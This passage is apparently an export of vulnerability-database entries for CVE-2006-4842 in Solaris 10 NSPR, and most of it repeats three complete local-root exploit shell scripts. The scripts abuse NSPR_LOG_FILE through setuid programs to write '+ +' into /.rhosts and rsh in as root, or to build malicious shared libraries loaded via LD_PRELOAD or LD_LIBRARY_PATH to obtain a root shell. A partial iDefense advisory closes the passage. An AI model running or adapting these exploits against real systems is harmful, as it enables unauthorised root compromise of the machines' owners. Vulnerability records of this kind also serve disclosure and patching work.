running on Sun Solaris 10 is vulnerable to this issue.\r\n\r\n#!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $\r\n#\r\n# raptor_libnspr3 - Solaris 10 libnspr constructor exploit\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of \r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to \r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Yet another newschool version of the local root exploit: this time we place\r\n# our code in the global constructor (ctors) for the library, as suggested by\r\n# gera. This way, we don't have to hide a real function and we have a generic\r\n# library that can be used in all exploits like this. 
To avoid annoying side-\r\n# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing\r\n# a library in the default search path.\r\n#\r\n# See also:\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr2\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr3\r\n# $ ./raptor_libnspr3\r\n# [...]\r\n# Sun Microsystems Inc. SunOS 5.10 Generic January 2005\r\n# # id\r\n# uid=0(root) gid=1(other)\r\n# # rm /usr/lib/secure/libldap.so.5\r\n# #\r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n#\r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho "raptor_libnspr3 - Solaris 10 libnspr constructor exploit"\r\necho "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/usr/lib/secure/libldap.so.5\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/sbin/lpmove\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# prepare the evil shared library\r\necho "void __attribute__ ((constructor)) cons() {" > /tmp/ctors.c\r\necho " setuid(0);" >> /tmp/ctors.c\r\necho " execle(\\"/bin/ksh\\", \\"ksh\\", 0, 0);" >> /tmp/ctors.c\r\necho "}" >> /tmp/ctors.c\r\ngcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc\r\nif [ $? 
-ne 0 ]; then\r\n\techo "problems compiling evil shared library, check your gcc"\r\n\texit 1\r\nfi\r\n\r\n# newschool LD_LIBRARY_PATH foo;)\r\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\r\nLD_LIBRARY_PATH=/usr/lib/secure su -\r\n\r\n\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-82336"}, {"lastseen": "2017-11-19T21:30:36", "description": "CVE-2006-4842\r\n\r\nThe Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability.\r\n\r\nA successful exploit of this issue allows an attacker to gain superuser privileges, completely compromising the affected computer. \r\n\r\nVersion 4.6.1 running on Sun Solaris 10 is vulnerable to this issue. \n\nSun Solaris 10.0_x86\r\nSun Solaris 10.0\r\nNetscape Portable Runtime API 4.6.1 \n Sun Solaris 10.0\r\n\r\nSun 119213-10\r\n<a href=http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1 target=_blank>http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1</a>\r\n\r\n\r\nSun Solaris 10.0_x86\r\n\r\nSun 119214-10\r\n<a href=http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1 target=_blank>http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1</a>", "published": "2008-08-22T00:00:00", "title": "Sun Solaris Netscape Portable Runtime API Local Privilege Escalation Vulnerabili", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2008-08-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3899", "id": "SSV:3899", "sourceData": "\n #!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $\r\n#\r\n# raptor_libnspr - Solaris 10 libnspr oldschool local root\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error v\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, 
"sourceHref": "https://www.seebug.org/vuldb/ssvid-3899"}, {"lastseen": "2017-11-19T15:24:02", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Solaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Local Root Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-64124", "id": "SSV:64124", "sourceData": "\n #!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr2,v 1.4 2006/10/16 11:50:48 raptor Exp $\r\n#\r\n# raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of\r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Newschool version of local root exploit via LD_PRELOAD (hi KF!). Another\r\n# possible (but less l33t;) attack vector is /var/spool/cron/atjobs.\r\n#\r\n# See also: http://www.0xdeadbeef.info/exploits/raptor_libnspr\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr2\r\n# $ ./raptor_libnspr2\r\n# [...]\r\n# Sun Microsystems Inc. 
SunOS 5.10 Generic January 2005\r\n# # id\r\n# uid=0(root) gid=0(root)\r\n# # rm /usr/lib/secure/getuid.so\r\n# #\r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n#\r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho "raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit"\r\necho "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/usr/lib/secure/getuid.so\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/lib/sendmail\r\n#/usr/sbin/lpmove\r\n#/usr/bin/login\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# prepare the evil shared library\r\necho "int getuid(){return 0;}" > /tmp/getuid.c\r\ngcc -fPIC -Wall -g -O2 -shared -o /usr/lib/secure/getuid.so /tmp/getuid.c -lc\r\nif [ $? 
-ne 0 ]; then\r\n\techo "problems compiling evil shared library, check your gcc"\r\n\texit 1\r\nfi\r\n\r\n# newschool LD_PRELOAD foo;)\r\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\r\nLD_PRELOAD=/usr/lib/secure/getuid.so su -\r\n\r\n# milw0rm.com [2006-10-16]\r\n\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-64124"}, {"lastseen": "2017-11-19T16:09:38", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Solaris 10 libnspr - constructor Local Root Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-64170", "id": "SSV:64170", "sourceData": "\n #!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $\r\n#\r\n# raptor_libnspr3 - Solaris 10 libnspr constructor exploit\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of \r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to \r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Yet another newschool version of the local root exploit: this time we place\r\n# our code in the global constructor (ctors) for the library, as suggested by\r\n# gera. This way, we don't have to hide a real function and we have a generic\r\n# library that can be used in all exploits like this. 
To avoid annoying side-\r\n# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing\r\n# a library in the default search path.\r\n#\r\n# See also:\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr2\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr3\r\n# $ ./raptor_libnspr3\r\n# [...]\r\n# Sun Microsystems Inc. SunOS 5.10 Generic January 2005\r\n# # id\r\n# uid=0(root) gid=1(other)\r\n# # rm /usr/lib/secure/libldap.so.5\r\n# #\r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n#\r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho "raptor_libnspr3 - Solaris 10 libnspr constructor exploit"\r\necho "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/usr/lib/secure/libldap.so.5\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/sbin/lpmove\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# prepare the evil shared library\r\necho "void __attribute__ ((constructor)) cons() {" > /tmp/ctors.c\r\necho " setuid(0);" >> /tmp/ctors.c\r\necho " execle(\\"/bin/ksh\\", \\"ksh\\", 0, 0);" >> /tmp/ctors.c\r\necho "}" >> /tmp/ctors.c\r\ngcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc\r\nif [ $? 
-ne 0 ]; then\r\n\techo "problems compiling evil shared library, check your gcc"\r\n\texit 1\r\nfi\r\n\r\n# newschool LD_LIBRARY_PATH foo;)\r\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\r\nLD_LIBRARY_PATH=/usr/lib/secure su -\r\n\r\n# milw0rm.com [2006-10-24]\r\n\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-64170"}, {"lastseen": "2017-11-19T22:24:17", "description": "No description provided by source.", "published": "2006-10-27T00:00:00", "title": "Solaris 10 libnspr LD_PRELOAD Arbitrary File Creation Local Root Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-5298", "id": "SSV:5298", "sourceData": "\n #!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr2,v 1.4 2006/10/16 11:50:48 raptor Exp $\r\n#\r\n# raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of\r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Newschool version of local root exploit via LD_PRELOAD (hi KF!). Another\r\n# possible (but less l33t;) attack vector is /var/spool/cron/atjobs.\r\n#\r\n# See also: http://www.0xdeadbeef.info/exploits/raptor_libnspr\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr2\r\n# $ ./raptor_libnspr2\r\n# [...]\r\n# Sun Microsystems Inc. 
SunOS 5.10 Generic January 2005\r\n# # id\r\n# uid=0(root) gid=0(root)\r\n# # rm /usr/lib/secure/getuid.so\r\n# #\r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n#\r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho "raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit"\r\necho "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/usr/lib/secure/getuid.so\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/lib/sendmail\r\n#/usr/sbin/lpmove\r\n#/usr/bin/login\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# prepare the evil shared library\r\necho "int getuid(){return 0;}" > /tmp/getuid.c\r\ngcc -fPIC -Wall -g -O2 -shared -o /usr/lib/secure/getuid.so /tmp/getuid.c -lc\r\nif [ $? 
-ne 0 ]; then\r\n\techo "problems compiling evil shared library, check your gcc"\r\n\texit 1\r\nfi\r\n\r\n# newschool LD_PRELOAD foo;)\r\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\r\nLD_PRELOAD=/usr/lib/secure/getuid.so su -\r\n\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-5298"}, {"lastseen": "2017-11-19T15:02:00", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Solaris 10 (libnspr) - Arbitrary File Creation Local Root Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-64104", "id": "SSV:64104", "sourceData": "\n #!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $\r\n#\r\n# raptor_libnspr - Solaris 10 libnspr oldschool local root\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of\r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. 
Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr\r\n# $ ./raptor_libnspr\r\n# [...]\r\n# # id\r\n# uid=0(root) gid=0(root)\r\n# # \r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n# \r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho "raptor_libnspr - Solaris 10 libnspr oldschool local root"\r\necho "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/.rhosts\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme rw-rw-rw!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/lib/sendmail\r\n#/usr/sbin/lpmove\r\n#/usr/bin/login\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# oldschool rhosts foo;)\r\necho "+ +" > $NSPR_LOG_FILE\r\nrsh -l root localhost sh -i\r\n\r\n# milw0rm.com [2006-10-13]\r\n\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-64104"}, {"lastseen": "2017-11-19T22:25:19", "description": "No description provided by source.", "published": "2006-10-25T00:00:00", "title": "Solaris 10 libnspr constructor Local Root Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-5260", "id": "SSV:5260", "sourceData": "\n #!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $\r\n#\r\n# raptor_libnspr3 - Solaris 10 libnspr constructor exploit\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local 
exploitation of a design error vulnerability in version 4.6.1 of \r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to \r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Yet another newschool version of the local root exploit: this time we place\r\n# our code in the global constructor (ctors) for the library, as suggested by\r\n# gera. This way, we don't have to hide a real function and we have a generic\r\n# library that can be used in all exploits like this. To avoid annoying side-\r\n# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing\r\n# a library in the default search path.\r\n#\r\n# See also:\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr2\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr3\r\n# $ ./raptor_libnspr3\r\n# [...]\r\n# Sun Microsystems Inc. 
SunOS 5.10 Generic January 2005\r\n# # id\r\n# uid=0(root) gid=1(other)\r\n# # rm /usr/lib/secure/libldap.so.5\r\n# #\r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n#\r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho "raptor_libnspr3 - Solaris 10 libnspr constructor exploit"\r\necho "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/usr/lib/secure/libldap.so.5\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/sbin/lpmove\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# prepare the evil shared library\r\necho "void __attribute__ ((constructor)) cons() {" > /tmp/ctors.c\r\necho " setuid(0);" >> /tmp/ctors.c\r\necho " execle(\\"/bin/ksh\\", \\"ksh\\", 0, 0);" >> /tmp/ctors.c\r\necho "}" >> /tmp/ctors.c\r\ngcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc\r\nif [ $? 
-ne 0 ]; then\r\n\techo "problems compiling evil shared library, check your gcc"\r\n\texit 1\r\nfi\r\n\r\n# newschool LD_LIBRARY_PATH foo;)\r\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\r\nLD_LIBRARY_PATH=/usr/lib/secure su -\r\n\r\n\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-5260"}, {"lastseen": "2017-11-19T22:27:38", "description": "No description provided by source.", "published": "2006-10-13T00:00:00", "title": "Solaris 10 (libnspr) Arbitrary File Creation Local Root Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-16657", "id": "SSV:16657", "sourceData": "\n #!/bin/sh\n\n#\n# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $\n#\n# raptor_libnspr - Solaris 10 libnspr oldschool local root\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# Local exploitation of a design error vulnerability in version 4.6.1 of\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\n# create or overwrite arbitrary files on the system. The problem exists \n# because environment variables are used to create log files. 
Even when the\n# program is setuid, users can specify a log file that will be created with \n# elevated privileges (CVE-2006-4842).\n#\n# Usage:\n# $ chmod +x raptor_libnspr\n# $ ./raptor_libnspr\n# [...]\n# # id\n# uid=0(root) gid=0(root)\n# # \n#\n# Vulnerable platforms (SPARC):\n# Solaris 10 without patch 119213-10 [tested]\n# \n# Vulnerable platforms (x86):\n# Solaris 10 without patch 119214-10 [untested]\n#\n\necho "raptor_libnspr - Solaris 10 libnspr oldschool local root"\necho "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"\necho\n\n# prepare the environment\nNSPR_LOG_MODULES=all:5\nNSPR_LOG_FILE=/.rhosts\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\n\n# gimme rw-rw-rw!\numask 0\n\n# setuid program linked to /usr/lib/mps/libnspr4.so\n/usr/bin/chkey\n\n# other good setuid targets\n#/usr/bin/passwd\n#/usr/bin/lp\n#/usr/bin/cancel\n#/usr/bin/lpset\n#/usr/bin/lpstat\n#/usr/lib/lp/bin/netpr\n#/usr/lib/sendmail\n#/usr/sbin/lpmove\n#/usr/bin/login\n#/usr/bin/su\n#/usr/bin/mailq\n\n# oldschool rhosts foo;)\necho "+ +" > $NSPR_LOG_FILE\nrsh -l root localhost sh -i\n\n# milw0rm.com [2006-10-13]\n\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-16657"}, {"lastseen": "2017-11-19T15:57:43", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation Vulnerability (1)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-82335", "id": "SSV:82335", "sourceData": "\n source: http://www.securityfocus.com/bid/20471/info\r\n\r\nThe Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability.\r\n\r\nA successful exploit of this issue allows an attacker to gain superuser privileges, completely 
compromising the affected computer. \r\n\r\nVersion 4.6.1 running on Sun Solaris 10 is vulnerable to this issue.\r\n\r\n#!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $\r\n#\r\n# raptor_libnspr - Solaris 10 libnspr oldschool local root\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of\r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr\r\n# $ ./raptor_libnspr\r\n# [...]\r\n# # id\r\n# uid=0(root) gid=0(root)\r\n# # \r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n# \r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho "raptor_libnspr - Solaris 10 libnspr oldschool local root"\r\necho "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/.rhosts\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme rw-rw-rw!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/lib/sendmail\r\n#/usr/sbin/lpmove\r\n#/usr/bin/login\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# oldschool rhosts foo;)\r\necho "+ +" > $NSPR_LOG_FILE\r\nrsh -l root localhost sh -i\r\n\r\n\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-82335"}], "securityvulns": 
[{"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "cvelist": ["CVE-2006-4842"], "description": "Sun Microsystems Solaris NSPR Library Arbitrary File Creation Vulnerability\r\n\r\niDefense Security Advisory 10.11.06\r\nhttp://www.idefense.com/intelligence/vulnerabilities/\r\nOct 11, 2006\r\n\r\nI. BACKGROUND\r\n\r\nThe Netscape Portable Runtime (NSPR) API allows compliant applications\r\nto use system facilities such as threads, thread synchronization, I/O,\r\ninterval timing, atomic operations and several other low-level services\r\nin a platform-independent manner. More information can be found on\r\nMozilla's website at http://www.mozilla.org/projects/nspr/.\r\n\r\nII. DESCRIPTION\r\n\r\nLocal exploitation of a design error vulnerability in version 4.6.1 of\r\nNSPR, as included with Sun Microsystems Solaris 10, allows attackers to\r\ncreate or overwrite arbitrary files on the system.\r\n\r\nThe problem exists because environment variables are used to create log\r\nfiles. Even when the program is setuid, users can specify a log file\r\nthat will be created with elevated privileges.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation allows local attackers to elevate privileges to root.\r\n\r\nIV. DETECTION\r\n\r\niDefense confirmed that Solaris 10 with NSPR version 4.6.1 is vulnerable\r\nto privilege escalation. Additionally, iDefense has also confirmed via\r\nthe source code that version 4.6.2 does not address the vulnerability.\r\n\r\nV. WORKAROUND\r\n\r\niDefense is currently unaware of any effective workaround for this\r\nissue.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nSun Microsystems has addressed this issue with Sun Security Alert 102658\r\nwhich can be found at:\r\nhttp://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2006-4842 to this issue. 
